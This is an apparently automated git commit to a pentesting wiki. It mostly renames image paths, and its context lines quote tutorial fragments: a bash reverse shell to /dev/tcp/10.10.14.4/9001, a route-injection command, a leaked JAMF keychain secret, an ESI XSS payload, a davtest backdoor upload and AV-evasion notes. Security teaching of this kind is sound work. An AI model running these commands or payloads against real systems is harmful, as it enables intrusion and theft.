GITBOOK-3984: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-06-14 10:51:55 +00:00 committed by gitbook-bot
parent fa3b6dffc2
commit 9a68c91e4e
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
59 changed files with 36 additions and 36 deletions

Binary file not shown.

Before

Width:  |  Height:  |  Size: 28 KiB

After

Width:  |  Height:  |  Size: 160 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 129 KiB

After

Width:  |  Height:  |  Size: 58 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 145 KiB

After

Width:  |  Height:  |  Size: 358 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 76 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 32 KiB

After

Width:  |  Height:  |  Size: 350 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 8 KiB

After

Width:  |  Height:  |  Size: 344 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 82 KiB

After

Width:  |  Height:  |  Size: 8 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 160 KiB

After

Width:  |  Height:  |  Size: 3.4 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 535 KiB

After

Width:  |  Height:  |  Size: 33 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 58 KiB

After

Width:  |  Height:  |  Size: 535 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 76 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 76 KiB

After

Width:  |  Height:  |  Size: 148 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 148 KiB

After

Width:  |  Height:  |  Size: 199 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 199 KiB

After

Width:  |  Height:  |  Size: 172 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 61 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 244 KiB

After

Width:  |  Height:  |  Size: 102 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 358 KiB

After

Width:  |  Height:  |  Size: 244 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 19 KiB

After

Width:  |  Height:  |  Size: 39 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 39 KiB

After

Width:  |  Height:  |  Size: 78 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 78 KiB

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 38 KiB

After

Width:  |  Height:  |  Size: 28 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 60 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 220 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 220 KiB

After

Width:  |  Height:  |  Size: 45 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 45 KiB

After

Width:  |  Height:  |  Size: 96 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 96 KiB

After

Width:  |  Height:  |  Size: 129 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 53 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 53 KiB

After

Width:  |  Height:  |  Size: 91 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 91 KiB

After

Width:  |  Height:  |  Size: 316 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 316 KiB

After

Width:  |  Height:  |  Size: 29 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 29 KiB

After

Width:  |  Height:  |  Size: 145 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 55 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 55 KiB

After

Width:  |  Height:  |  Size: 405 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 405 KiB

After

Width:  |  Height:  |  Size: 76 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 103 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 103 KiB

After

Width:  |  Height:  |  Size: 27 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 32 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 61 KiB

After

Width:  |  Height:  |  Size: 82 KiB

View file

@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio.
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
![](<../.gitbook/assets/image (3) (1) (1) (1).png>) ![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
![](<../.gitbook/assets/image (4) (1) (1) (1).png>) ![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
Press **Uninstall** (yeah, its weird but trust me, it is necessary) Press **Uninstall** (yeah, its weird but trust me, it is necessary)
![](<../.gitbook/assets/image (5) (1) (1) (2).png>) ![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
### **Exit Visual Studio and execute DllExport\_configure** ### **Exit Visual Studio and execute DllExport\_configure**

View file

@ -137,7 +137,7 @@ Arguments of the script:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
``` ```
<figure><img src="../../.gitbook/assets/image (20) (1) (2).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure>
**Our host seems to be in trouble :)** **Our host seems to be in trouble :)**

View file

@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
![](<../../.gitbook/assets/image (19).png>) ![](<../../.gitbook/assets/image (13).png>)
#### JAMF device Authentication #### JAMF device Authentication
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
#### Secrets stealing #### Secrets stealing
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p>a</p></figcaption></figure> <figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption><p>a</p></figcaption></figure>
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
## References ## References

View file

@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\ If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
Like for example in this image (taken from the reference): Like for example in this image (taken from the reference):
<figure><img src="../../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit: Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:

View file

@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The
* Going into **recovery mode** Kexts need to be **allowed to be loaded**: * Going into **recovery mode** Kexts need to be **allowed to be loaded**:
<figure><img src="../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed. * The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
* The Kext also needs to be **notarized**, Apple will be able to check it for malware. * The Kext also needs to be **notarized**, Apple will be able to check it for malware.

View file

@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture ### Endpoint Security Framework Architecture
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: **User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:

View file

@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool: or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch. As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */
Example of **section header**: Example of **section header**:
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC` If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
It's also possible to get **headers information** from the **command line** with: It's also possible to get **headers information** from the **command line** with:

View file

@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %} {% endcode %}
{% hint style="danger" %} {% hint style="danger" %}
Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set. Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes. However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
{% endhint %} {% endhint %}

View file

@ -14,7 +14,7 @@
## Sandbox loading process ## Sandbox loading process
<figure><img src="../../../../../.gitbook/assets/image (2).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure> <figure><img src="../../../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run. In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.

View file

@ -143,7 +143,7 @@ $> ls ~/Documents
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file: Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
<figure><img src="../../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
### CVE-2021-XXXX - Translocation ### CVE-2021-XXXX - Translocation
@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple). In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
<figure><img src="../../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
## Reference ## Reference

View file

@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP: When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
<figure><img src="../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owners permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner. Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owners permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.

View file

@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every
Output sample: Output sample:
![](<../../.gitbook/assets/image (19) (1) (1).png>) ![](<../../.gitbook/assets/image (19) (1).png>)
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web. This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.

View file

@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Configure WebHook script: * Configure WebHook script:
<figure><img src="../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
* Save changes * Save changes
* Get the generated WebHook URL: * Get the generated WebHook URL:
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
* Call it with curl and you shuold receive the rev shell * Call it with curl and you shuold receive the rev shell

View file

@ -206,7 +206,7 @@ The following will add a `Location` header to the response
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/--> <!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
``` ```
<figure><img src="../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
#### CRLF in Add header (**CVE-2019-2438)** #### CRLF in Add header (**CVE-2019-2438)**

View file

@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
In the Burp's builtin browser go to the **Burp extension** and enable it: In the Burp's builtin browser go to the **Burp extension** and enable it:
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:** Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
### Inject a Canary ### Inject a Canary
@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it: DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**. Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.

View file

@ -24,7 +24,7 @@ For more info about what is an iButton check:
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**. The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
<figure><img src="../../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
## Actions ## Actions

View file

@ -16,7 +16,7 @@
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside. iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
<figure><img src="../../.gitbook/assets/image (19) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a> ### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>

View file

@ -32,7 +32,7 @@ IR protocols differ in 3 factors:
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant. Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
<figure><img src="../../.gitbook/assets/image (16) (3).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
**2. Pulse Width Encoding** **2. Pulse Width Encoding**

View file

@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details> </details>
@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry: This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
<figure><img src="../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (6) (2) (1).png" alt=""><figcaption></figcaption></figure>
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interfaces `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default. Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interfaces `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details> </details>

View file

@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure> <figure><img src="../.gitbook/assets/image (2) (1) (1) (2) (1).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something: As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**. It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
<figure><img src="../.gitbook/assets/image (7) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (7) (1) (3).png" alt=""><figcaption></figcaption></figure>
* **Inline** * **Inline**

View file

@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") {
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**. * **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder: * Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
<figure><img src="../../../.gitbook/assets/image (18) (3).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
### Missed Dlls ### Missed Dlls